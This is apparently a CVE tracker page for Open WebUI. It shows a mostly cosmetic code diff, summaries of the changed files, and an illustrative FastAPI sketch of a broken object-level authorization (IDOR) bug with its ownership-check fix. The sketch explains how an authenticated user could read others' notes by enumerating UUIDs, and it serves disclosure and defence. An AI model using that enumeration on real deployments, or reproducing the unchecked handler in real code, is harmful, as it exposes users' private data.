'processing_failed', + 'file_name': self.file_name, }, ) ] @@ -697,11 +649,11 @@ async def load_async(self) -> List[Document]: async with self._get_session() as session: await self._delete_file_async(session, file_id) except Exception as cleanup_error: - log.error(f"Cleanup failed for file ID {file_id}: {cleanup_error}") + log.error(f'Cleanup failed for file ID {file_id}: {cleanup_error}') @staticmethod async def load_multiple_async( - loaders: List["MistralLoader"], + loaders: List['MistralLoader'], max_concurrent: int = 5, # Limit concurrent requests ) -> List[List[Document]]: """ @@ -717,15 +669,13 @@ async def load_multiple_async( if not loaders: return [] - log.info( - f"Starting concurrent processing of {len(loaders)} files with max {max_concurrent} concurrent" - ) + log.info(f'Starting concurrent processing of {len(loaders)} files with max {max_concurrent} concurrent') start_time = time.time() # Use semaphore to control concurrency semaphore = asyncio.Semaphore(max_concurrent) - async def 
process_with_semaphore(loader: "MistralLoader") -> List[Document]: + async def process_with_semaphore(loader: 'MistralLoader') -> List[Document]: async with semaphore: return await loader.load_async() @@ -737,14 +687,14 @@ async def process_with_semaphore(loader: "MistralLoader") -> List[Document]: processed_results = [] for i, result in enumerate(results): if isinstance(result, Exception): - log.error(f"File {i} failed: {result}") + log.error(f'File {i} failed: {result}') processed_results.append( [ Document( - page_content=f"Error processing file: {result}", + page_content=f'Error processing file: {result}', metadata={ - "error": "batch_processing_failed", - "file_index": i, + 'error': 'batch_processing_failed', + 'file_index': i, }, ) ] @@ -755,15 +705,13 @@ async def process_with_semaphore(loader: "MistralLoader") -> List[Document]: # MONITORING: Log comprehensive batch processing statistics total_time = time.time() - start_time total_docs = sum(len(docs) for docs in processed_results) - success_count = sum( - 1 for result in results if not isinstance(result, Exception) - ) + success_count = sum(1 for result in results if not isinstance(result, Exception)) failure_count = len(results) - success_count log.info( - f"Batch processing completed in {total_time:.2f}s: " - f"{success_count} files succeeded, {failure_count} files failed, " - f"produced {total_docs} total documents" + f'Batch processing completed in {total_time:.2f}s: ' + f'{success_count} files succeeded, {failure_count} files failed, ' + f'produced {total_docs} total documents' ) return processed_results
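The batch fan-out is a standard semaphore-bounded gather. Schematically, assuming loaders is any list of objects exposing load_async:

    import asyncio


    async def load_all(loaders, max_concurrent: int = 5):
        semaphore = asyncio.Semaphore(max_concurrent)

        async def load_one(loader):
            async with semaphore:  # at most max_concurrent in flight
                return await loader.load_async()

        # return_exceptions=True: failures come back as values, so each
        # file can be reported or replaced by an error document.
        return await asyncio.gather(*(load_one(ldr) for ldr in loaders),
                                    return_exceptions=True)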
backend/open_webui/retrieval/loaders/tavily.py +16 −16 modified
Quote-style changes only. The Tavily extract loader still requires at least one URL, accepts an extract_depth of 'basic' or 'advanced', and POSTs batches of URLs to https://api.tavily.com/extract with a Bearer token (a single URL is sent as a string, multiple as an array). Each successful result is yielded as a Document with the source URL as metadata; empty extractions are logged and skipped, entries in failed_results are logged as errors, and batch-level exceptions are swallowed or re-raised according to continue_on_failure.
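The batching in lazy_load is plain fixed-size slicing (the loader's actual batch size is not visible in the hunk). As a generic sketch:

    from typing import Iterator, List


    def batched(items: List[str], batch_size: int) -> Iterator[List[str]]:
        # urls[i : i + batch_size] slices, as in TavilyLoader.lazy_load
        for i in range(0, len(items), batch_size):
            yield items[i : i + batch_size]

    # list(batched(['a', 'b', 'c'], 2)) -> [['a', 'b'], ['c']]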
backend/open_webui/retrieval/loaders/youtube.py +26 −34 modified
Same mechanical reformatting. _parse_video_id still restricts URLs to http/https on a fixed set of hosts (youtu.be, m.youtube.com, youtube.com, www.youtube.com, www.youtube-nocookie.com, vid.plus), reads the v query parameter for /watch URLs or the last path segment otherwise, and rejects anything that is not exactly 11 characters long. YoutubeLoader keeps its language-priority list with 'en' appended as a fallback, optional proxying through GenericProxyConfig, a preference for manually created transcripts over generated ones, space-joined transcript pieces, and a NoTranscriptFound error (after a logged warning listing the languages tried) when no language yields a transcript; a missing youtube_transcript_api package raises an ImportError with install instructions.
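The ID extraction is a small urlparse exercise. A schematic version of _parse_video_id, assuming the module constants gate the URL as their names suggest (that check sits outside the hunk shown):

    from typing import Optional
    from urllib.parse import parse_qs, urlparse

    ALLOWED_SCHEMES = {'http', 'https'}
    ALLOWED_NETLOCS = {'youtu.be', 'm.youtube.com', 'youtube.com',
                       'www.youtube.com', 'www.youtube-nocookie.com', 'vid.plus'}


    def parse_video_id(url: str) -> Optional[str]:
        parsed = urlparse(url)
        if parsed.scheme not in ALLOWED_SCHEMES or parsed.netloc not in ALLOWED_NETLOCS:
            return None
        if parsed.path.endswith('/watch'):
            ids = parse_qs(parsed.query).get('v')
            video_id = ids[0] if ids else None
        else:
            # e.g. https://youtu.be/<id>: take the trailing path segment
            video_id = parsed.path.lstrip('/').split('/')[-1]
        if not video_id or len(video_id) != 11:  # video IDs are 11 characters
            return None
        return video_id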
backend/open_webui/retrieval/models/colbert.py +8 −20 modified
Reformatting plus the removal of a few blank lines. The ColBERT reranker still selects 'cuda' when available, keeps the Docker workaround that deletes a stale torch-extensions lock file (/root/.cache/torch_extensions/py311_cpu/segmented_maxsim_cpp/lock), validates that query and document embeddings are 3-dimensional with a query batch of 1 or one query per document, permutes the query embeddings for the matrix multiplication, and returns normalized scores as float32 NumPy arrays; predict() scores one query against all candidate documents.
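The scoring these hunks reformat is ColBERT's late-interaction MaxSim: each query token is matched to its best document token and the maxima are summed per document. A minimal torch sketch of that step (function name invented; encoding and score normalization omitted):

    import torch


    def maxsim_scores(query_emb: torch.Tensor, doc_embs: torch.Tensor) -> torch.Tensor:
        # query_emb: (1, q_tokens, dim); doc_embs: (n_docs, d_tokens, dim)
        # permute(0, 2, 1) mirrors the transposition in calculate_similarity_scores
        sim = torch.matmul(doc_embs, query_emb.permute(0, 2, 1))  # (n_docs, d_tokens, q_tokens)
        # best document token per query token, summed over query tokens
        return sim.max(dim=1).values.sum(dim=1)  # (n_docs,)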
backend/open_webui/retrieval/models/external.py +17 −19 modified
Quote-style changes only. ExternalReranker still POSTs model, query, documents, and top_n to the configured rerank endpoint (default http://localhost:8080/v1/rerank) with a Bearer token, optionally forwarding user-info headers when ENABLE_FORWARD_USER_INFO_HEADERS is set. It sorts the returned results by their index field to realign them with the input documents and returns the relevance scores; any error is logged and the method returns None.
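The index-based sort matters because rerank APIs typically return results ordered by relevance, not input position. A tiny sketch with made-up response data:

    def scores_in_input_order(results: list[dict]) -> list[float]:
        # sorted(data['results'], key=lambda x: x['index']), as in predict()
        ordered = sorted(results, key=lambda r: r['index'])
        return [r['relevance_score'] for r in ordered]


    resp = [{'index': 2, 'relevance_score': 0.91},
            {'index': 0, 'relevance_score': 0.40},
            {'index': 1, 'relevance_score': 0.12}]
    print(scores_in_input_order(resp))  # [0.4, 0.12, 0.91]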
backend/open_webui/retrieval/utils.py +0 −0 modified
backend/open_webui/retrieval/vector/dbs/chroma.py +29 −41 modified
backend/open_webui/retrieval/vector/dbs/elasticsearch.py +79 −98 modified
backend/open_webui/retrieval/vector/dbs/mariadb_vector.py +61 −71 modified
backend/open_webui/retrieval/vector/dbs/milvus_multitenancy.py +55 −73 modified
backend/open_webui/retrieval/vector/dbs/milvus.py +90 −127 modified
backend/open_webui/retrieval/vector/dbs/opengauss.py +61 −100 modified
backend/open_webui/retrieval/vector/dbs/opensearch.py +73 −91 modified
backend/open_webui/retrieval/vector/dbs/oracle23ai.py +93 −139 modified
backend/open_webui/retrieval/vector/dbs/pgvector.py +106 −177 modified
backend/open_webui/retrieval/vector/dbs/pinecone.py +92 −160 modified
backend/open_webui/retrieval/vector/dbs/qdrant_multitenancy.py +29 −51 modified
backend/open_webui/retrieval/vector/dbs/qdrant.py +39 −45 modified
backend/open_webui/retrieval/vector/dbs/s3vector.py +139 −210 modified
backend/open_webui/retrieval/vector/dbs/weaviate.py +47 −77 modified
backend/open_webui/retrieval/vector/factory.py +1 −2 modified
backend/open_webui/retrieval/vector/main.py +1 −3 modified
backend/open_webui/retrieval/vector/type.py +12 −12 modified
backend/open_webui/retrieval/vector/utils.py +2 −4 modified
backend/open_webui/retrieval/web/azure.py +26 −29 modified
backend/open_webui/retrieval/web/bing.py +16 −20 modified
backend/open_webui/retrieval/web/bocha.py +19 −26 modified
backend/open_webui/retrieval/web/brave.py +11 −13 modified
backend/open_webui/retrieval/web/duckduckgo.py +6 −8 modified
backend/open_webui/retrieval/web/exa.py +15 −17 modified
backend/open_webui/retrieval/web/external.py +10 −10 modified
backend/open_webui/retrieval/web/firecrawl.py +3 −5 modified
backend/open_webui/retrieval/web/google_pse.py +14 −16 modified
backend/open_webui/retrieval/web/jina_search.py +11 −13 modified
backend/open_webui/retrieval/web/kagi.py +7 −11 modified
backend/open_webui/retrieval/web/main.py +1 −1 modified
backend/open_webui/retrieval/web/mojeek.py +6 −11 modified
backend/open_webui/retrieval/web/ollama.py +10 −10 modified
backend/open_webui/retrieval/web/perplexity.py +29 −32 modified
backend/open_webui/retrieval/web/perplexity_search.py +11 −14 modified
backend/open_webui/retrieval/web/searchapi.py +10 −12 modified
backend/open_webui/retrieval/web/searxng.py +24 −26 modified
backend/open_webui/retrieval/web/serpapi.py +10 −12 modified
backend/open_webui/retrieval/web/serper.py +9 −13 modified
backend/open_webui/retrieval/web/serply.py +21 −23 modified
backend/open_webui/retrieval/web/serpstack.py +7 −11 modified
backend/open_webui/retrieval/web/sougou.py +9 −16 modified
backend/open_webui/retrieval/web/tavily.py +8 −8 modified
backend/open_webui/retrieval/web/utils.py +99 −118 modified
backend/open_webui/retrieval/web/yacy.py +18 −18 modified
backend/open_webui/retrieval/web/yandex.py +47 −61 modified
backend/open_webui/retrieval/web/ydc.py +13 −13 modified
backend/open_webui/routers/analytics.py +57 −75 modified
backend/open_webui/routers/audio.py +371 −455 modified
backend/open_webui/routers/auths.py +280 −386 modified
backend/open_webui/routers/channels.py +416 −734 modified
backend/open_webui/routers/chats.py +218 −364 modified
backend/open_webui/routers/configs.py +146 −195 modified
backend/open_webui/routers/evaluations.py +68 −123 modified
backend/open_webui/routers/files.py +125 −217 modified
backend/open_webui/routers/folders.py +44 −76 modified
backend/open_webui/routers/functions.py +73 −124 modified
backend/open_webui/routers/groups.py +29 −40 modified
backend/open_webui/routers/images.py +325 −431 modified
backend/open_webui/routers/knowledge.py +137 −174 modified
backend/open_webui/routers/memories.py +41 −62 modified
backend/open_webui/routers/models.py +84 −108 modified
backend/open_webui/routers/notes.py +65 −87 modified
backend/open_webui/routers/ollama.py +381 −460 modified
backend/open_webui/routers/openai.py +336 −420 modified
backend/open_webui/routers/pipelines.py +103 −136 modified
backend/open_webui/routers/prompts.py +90 −110 modified
backend/open_webui/routers/retrieval.py +635 −846 modified
backend/open_webui/routers/scim.py +179 −203 modified
backend/open_webui/routers/skills.py +55 −61 modified
backend/open_webui/routers/tasks.py +218 −283 modified
backend/open_webui/routers/terminals.py +67 −78 modified
backend/open_webui/routers/tools.py +131 −181 modified
backend/open_webui/routers/users.py +79 −113 modified
backend/open_webui/routers/utils.py +22 −28 modified
backend/open_webui/socket/main.py +252 −289 modified
backend/open_webui/socket/utils.py +23 −30 modified
backend/open_webui/storage/provider.py +59 −84 modified
backend/open_webui/tasks.py +27 −29 modified
backend/open_webui/test/apps/webui/routers/test_auths.py +93 −97 modified
backend/open_webui/test/apps/webui/routers/test_models.py +24 −28 modified
backend/open_webui/test/apps/webui/routers/test_users.py +66 −68 modified
backend/open_webui/test/apps/webui/storage/test_provider.py +67 −96 modified
backend/open_webui/test/util/test_redis.py +216 −228 modified
backend/open_webui/tools/builtin.py +430 −467 modified
backend/open_webui/utils/access_control/files.py +8 −16 modified
backend/open_webui/utils/access_control/__init__.py +31 −57 modified
backend/open_webui/utils/actions.py +34 −36 modified
backend/open_webui/utils/anthropic.py +204 −212 modified
backend/open_webui/utils/audit.py +38 −58 modified
backend/open_webui/utils/auth.py +84 −94 modified
backend/open_webui/utils/channels.py +5 −5 modified
backend/open_webui/utils/chat.py +81 −91 modified
backend/open_webui/utils/code_interpreter.py +65 −76 modified
backend/open_webui/utils/embeddings.py +12 −12 modified
backend/open_webui/utils/files.py +26 −28 modified
backend/open_webui/utils/filter.py +27 −42 modified
backend/open_webui/utils/groups.py +1 −3 modified
backend/open_webui/utils/headers.py +1 −1 modified
backend/open_webui/utils/images/comfyui.py +96 −138 modified
backend/open_webui/utils/logger.py +47 −53 modified
backend/open_webui/utils/mcp/client.py +20 −28 modified
backend/open_webui/utils/middleware.py +1448 −1845 modified
backend/open_webui/utils/misc.py +185 −226 modified
backend/open_webui/utils/models.py +141 −170 modified
backend/open_webui/utils/oauth.py +291 −475 modified
backend/open_webui/utils/payload.py +117 −131 modified
backend/open_webui/utils/pdf_generator.py +22 −26 modified
backend/open_webui/utils/plugin.py +82 −114 modified
backend/open_webui/utils/rate_limit.py +3 −7 modified
backend/open_webui/utils/redis.py +37 −48 modified
backend/open_webui/utils/response.py +78 −96 modified
backend/open_webui/utils/sanitize.py +4 −6 modified
backend/open_webui/utils/security_headers.py +36 −36 modified
backend/open_webui/utils/task.py +89 −134 modified
backend/open_webui/utils/telemetry/constants.py +16 −16 modified
backend/open_webui/utils/telemetry/instrumentors.py +17 −31 modified
backend/open_webui/utils/telemetry/logs.py +3 −3 modified
backend/open_webui/utils/telemetry/metrics.py +33 −37 modified
backend/open_webui/utils/telemetry/setup.py +3 −3 modified
backend/open_webui/utils/tools.py +303 −388 modified
backend/open_webui/utils/validate.py +7 −9 modified
backend/open_webui/utils/webhook.py +21 −27 modified
contribution_stats.py +12 −14 modified
hatch_build.py +8 −10 modified
package.json +1 −1 modified
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
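Pending that synthesis, the sketch below illustrates the general class of bug at issue in object-level authorization (IDOR) findings of this kind: a FastAPI handler that looks up a record by a client-supplied UUID and returns it after authenticating the caller, but without checking that the caller owns the record. Every name in the sketch (User, Note, get_verified_user, the in-memory NOTES table) is hypothetical; this is not Open WebUI's actual handler code.

# Illustrative sketch of a broken object-level authorization (IDOR) bug
# and its fix, in the FastAPI style Open WebUI uses. All names here are
# hypothetical stand-ins, not the project's real code.
from dataclasses import dataclass

from fastapi import APIRouter, Depends, HTTPException


@dataclass
class User:
    id: str
    role: str


@dataclass
class Note:
    id: str
    user_id: str
    title: str


def get_verified_user() -> User:
    # A real dependency would validate the session or JWT. Authentication
    # alone is the only gate in the vulnerable shape of the handler.
    return User(id="user-a", role="user")


NOTES: dict[str, Note] = {
    "00000000-0000-0000-0000-000000000001": Note(
        id="00000000-0000-0000-0000-000000000001",
        user_id="user-b",
        title="someone else's note",
    )
}

router = APIRouter()


@router.get("/api/v1/notes/{note_id}")
async def get_note(note_id: str, user: User = Depends(get_verified_user)):
    note = NOTES.get(note_id)
    if not note:
        raise HTTPException(status_code=404, detail="Not found")

    # The vulnerable shape stops here and returns the note: any
    # authenticated user can read any note by enumerating UUIDs.
    # The fixed shape adds an object-level ownership check first:
    if note.user_id != user.id and user.role != "admin":
        # 404 rather than 403, so an enumerating client cannot even
        # confirm that a guessed UUID exists.
        raise HTTPException(status_code=404, detail="Not found")

    return note

Whether the actual fix checks only user_id or also role and group access is a detail of the patched notes router; the essential change in this class of fix is that the record is compared against the requesting user at all before being returned.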
References
4 news mentions
No linked articles in our index yet.